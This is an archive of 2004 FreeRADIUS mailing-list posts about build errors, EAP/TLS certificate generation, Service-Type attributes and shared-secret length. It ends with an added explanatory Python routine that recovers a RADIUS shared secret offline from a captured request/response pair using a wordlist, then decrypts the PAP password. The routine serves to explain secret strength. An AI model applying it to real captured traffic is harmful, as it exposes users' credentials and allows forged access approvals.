gmake[3]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules'
gmake[1]: *** [common] Error 1
gmake[1]: Leaving directory `/usr/local/freeradius-0.9.3/src'
make: *** [all] Error 2

Any idea ?

Thanks.
lara

non valid client cert for EAP/TLS

2004-09-22 Thread Lara Adianto
Hi list,

I set up EAP/TLS and FreeRadius auth for a Windows XP client, and currently hit the wall in the certificate generation.

I followed the instructions in the following howto on the net:
http://www.freeradius.org/doc/EAPTLS.pdf

The certs are generated as follows:

CA cert:
*
rm -rf demoCA
openssl req -new -x509 -keyout newreq.pem -out newreq.pem -days 730 -passin pass:whatever -passout pass:whatever
# '>' restored (lost in the archive); CA.sh -newca reads the name of the existing
# CA certificate file from stdin, so newreq.pem has to be supplied there
CA.sh -newca >/dev/null
/usr/local/openssl/bin/openssl pkcs12 -export -in newreq.pem -out root.p12 -cacerts -passin pass:whatever -passout pass:whatever
/usr/local/openssl/bin/openssl pkcs12 -in root.p12 -out root.pem -passin pass:whatever -passout pass:whatever
/usr/local/openssl/bin/openssl x509 -inform PEM -outform DER -in root.pem -out root.der

Client cert:
*
# newreq.pem receives both the private key and the request; 'openssl ca' below
# reads the request from it and 'pkcs12 -inkey' reads the key from it
/usr/local/openssl/bin/openssl req -new -keyout newreq.pem -out newreq.pem -days 730 -passin pass:wh
atever -passout pass:whatever
/usr/local/openssl/bin/openssl ca -policy policy_anything -out newcert.pem -passin pass:whatever -key whatever -extensions xpclient_ext -extfile xpextensions -infiles newreq.pem
/usr/local/openssl/bin/openssl pkcs12 -export -in newcert.pem -inkey newreq.pem -out cert-clt.p12 -clcerts -passin pass:whatever -passout pass:whatever
/usr/local/openssl/bin/openssl pkcs12 -in cert-clt.p12 -out cert-clt.pem -passin pass:whatever -passout pass:whatever
/usr/local/openssl/bin/openssl x509 -inform PEM -outform DER -in cert-clt.pem -out cert-clt.der
Then I transfered root.der and cert-clt.p12 to winxp and installed them, following the instructions in Ken Roser's howto.

The problem is that the client cert status showed: This certificate has a nonvalid digital signature. Attached are the CA cert and client cert (I don't bother with the server cert yet).

Btw, when I installed the CA, it said that windows can't verify the integrity of the CA because test.adianto.com can't be contacted. I chose to install the cert anyway, and the status is ok. So, probably that is not the source of the problem.

What can cause the 'nonvalid digital signature'? any suggestions how to solve ?
The openssl used is openssl-0.9.7d, installed in redhat linux.

Thanks,
lara

Attachments: ca_cert.cer, client_cert.cer


About Radius Attributes

2004-05-17 Thread Lara Adianto
Hello,

I need some information about the following
'service-type' attribute:
- Outbound
- Administrative
- NAS Prompt
- Call Check
- Callback NAS Prompt

1. In which case will a radius client request for the
above service type or which radius clients usually
request for the above service-type ? 
2. What attributes are usually returned in the
access-accept packet for the above service type ?

For Service-type PPP / SLIP requested, is there any
MANDATORY attributes that need to be returned by the
radius server in the access-accept packet
(Framed-IP-Address, Framed-MTU, etc) ? If the
Framed-IP-Address is not a mandatory attribute to be
returned for service-type PPP, how will the NAS decide
the IP Address assigned to the user ?

Thank you for any replies,
lara



Re: About Radius Attributes

2004-05-17 Thread Lara Adianto
Hi Alan,

 1. In which case will a radius client request for the above service type or which radius clients usually request for the above service-type ?

  http://www.freeradius.org/rfc/attributes.html
  Click on Service-Type, and it will tell you what those values mean, and when they're used.

I actually posted the question after reading the RFC. The RFC tells you a lot about the standard, but not about the current practice. What I need is some real-case examples. For example:
- Example of Radius client that asks for service-type outbound, and what kind of devices it wants to be granted access.
- Similarly, example of Radius client that asks for service-type administrative, NAS Prompt, Callback NAS Prompt, Call Check, and maybe some scenarios in which they are used ?

 2. What attributes are usually returned in the access-accept packet for the above service type ?

  It depends on your local configuration.

I understand that it depends on my own configuration. But I'm interested to know about the common practice out there. Would you care to elaborate more ? I'm still new to the Radius concept.

 For Service-type PPP / SLIP requested, is there any MANDATORY attributes that need to be returned by the radius server in the access-accept packet (Framed-IP-Address, Framed-MTU, etc) ?

  See the RFC's, and your NAS vendor documentation.

Can you please provide me with some links to any NAS vendor documentation ? I don't have any specific NAS in mind currently.

 If the Framed-IP-Address is not a mandatory attribute to be returned for service-type PPP, how will the NAS decide the IP Address assigned to the user ?

  See the NAS documentation.  It depends on the NAS.

  Alan DeKok.







shared secret length limitation

2004-05-13 Thread Lara Adianto
Hello,

Is there any limitation on the max length of the
shared secret ?
I can't find any information from RFC2865. It is only
stated that the shared secret MUST not be empty
(length 0) to prevent packets from being forged
easily, but it is not stated what the max length is.
What is the common practice used by radius servers and
clients ?
Some implementations limit the shared secret to be
between 1 - 128 characters.
But Freeradius limits the shared-secret to 32. What is
the rationale behind this ?

regards,
lara



Re:shared secret length limitation

2004-05-13 Thread Lara Adianto
Lara Adianto [EMAIL PROTECTED] wrote:
 What is the common practice used by radius servers and clients ?

  Not too short, not too long.  16 is a very common length.

 But Freeradius limits the shared-secret to 32. What is the rationale behind this ?

  Any longer than that, and it starts becoming unmanageable.

What does 'unmanageable' mean here ? Would you care to elaborate further ?

Is 16 bytes enough to protect the server from brute force attack ?

thank you,
lara

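The brute-force question in this thread has a concrete answer in the protocol itself. RFC 2865 authenticates a response with MD5 over the packet plus the shared secret, and hides a PAP User-Password with an MD5 keystream derived from the secret and the Request Authenticator; both can be checked offline against a single captured request/response pair, at one MD5 per guess and with no further contact with the server, so what protects the secret is its entropy against guessing rather than its length limit. The following added example (Python; not FreeRADIUS code) builds such a pair with a constructed secret, password and wordlist, recovers the secret the way an attacker would, and then decrypts the captured User-Password with it.

```python
# Added example (not FreeRADIUS code): offline guessing of a RADIUS shared
# secret from one captured Access-Request / Access-Accept pair, and what the
# recovered secret then exposes. Every packet, secret and password below is
# constructed for the demo.
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, FRAMED_IP_ADDRESS = 1, 2, 4, 8


def attribute(attr_type, value):
    """Type-Length-Value encoding of one RADIUS attribute."""
    return bytes([attr_type, 2 + len(value)]) + value


def attributes(packet):
    """Decode the attribute list after the 20-byte header (first of each type wins)."""
    out, i = {}, 20
    while i + 2 <= len(packet):
        attr_type, length = packet[i], packet[i + 1]
        if length < 2 or i + length > len(packet):
            break
        out.setdefault(attr_type, packet[i + 2:i + length])
        i += length
    return out


def user_password_encrypt(password, secret, request_auth):
    """RFC 2865 5.2: pad to 16n, XOR each chunk with MD5(secret + previous block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        chunk = bytes(p ^ b for p, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + chunk, chunk
    return out


def user_password_decrypt(value, secret, request_auth):
    out, prev = b"", request_auth
    for i in range(0, len(value), 16):
        out += bytes(c ^ b for c, b in zip(value[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = value[i:i + 16]
    return out.rstrip(b"\x00")


def access_request(ident, request_auth, attrs):
    body = b"".join(attrs)
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(body)) + request_auth + body


def response_authenticator(code, ident, body, request_auth, secret):
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return hashlib.md5(header + request_auth + body + secret).digest()


def access_accept(ident, request_auth, attrs, secret):
    body = b"".join(attrs)
    auth = response_authenticator(ACCESS_ACCEPT, ident, body, request_auth, secret)
    return struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(body)) + auth + body


def response_is_valid(request, response, secret):
    """The NAS-side check: recompute the Response Authenticator and compare."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    if ident != request[1] or length != len(response) or length < 20:
        return False
    expected = response_authenticator(code, ident, response[20:], request[4:20], secret)
    return hmac.compare_digest(response[4:20], expected)


def recover_secret(request, response, candidates):
    """Offline guessing: the NAS's own check, run against a wordlist."""
    for guess in candidates:
        if response_is_valid(request, response, guess):
            return guess
    return None


# Constructed capture of one PAP exchange (secret, authenticator, password made up)
SECRET = b"testing123"
REQUEST_AUTH = bytes.fromhex("a1b2c3d4e5f60718293a4b5c6d7e8f90")
REQUEST = access_request(23, REQUEST_AUTH, [
    attribute(USER_NAME, b"lara"),
    attribute(USER_PASSWORD, user_password_encrypt(b"s3cret-pap", SECRET, REQUEST_AUTH)),
    attribute(NAS_IP_ADDRESS, bytes([192, 168, 168, 60])),
])
RESPONSE = access_accept(23, REQUEST_AUTH,
                         [attribute(FRAMED_IP_ADDRESS, bytes([192, 168, 167, 90]))], SECRET)
WORDLIST = [b"radius", b"secret", b"password", b"testing123", b"changeme"]


def attack(request, response, wordlist):
    """Recover the secret from the captured pair, then read the PAP password with it."""
    secret = recover_secret(request, response, wordlist)
    if secret is None:
        return None, None
    password = user_password_decrypt(attributes(request)[USER_PASSWORD], secret, request[4:20])
    return secret, password


if __name__ == "__main__":
    print(attack(REQUEST, RESPONSE, WORDLIST))   # (b'testing123', b's3cret-pap')
```

Each guess costs one MD5 of a few dozen bytes, so a secret that appears in any wordlist falls regardless of how long it is, while 16 characters drawn uniformly from letters and digits (about 95 bits) are out of reach of this attack; the 32-character limit discussed in the thread is therefore not what decides the outcome. The same offline check applies to the Message-Authenticator attribute (HMAC-MD5 under the same secret), and a recovered secret also lets an attacker forge Access-Accepts to the NAS.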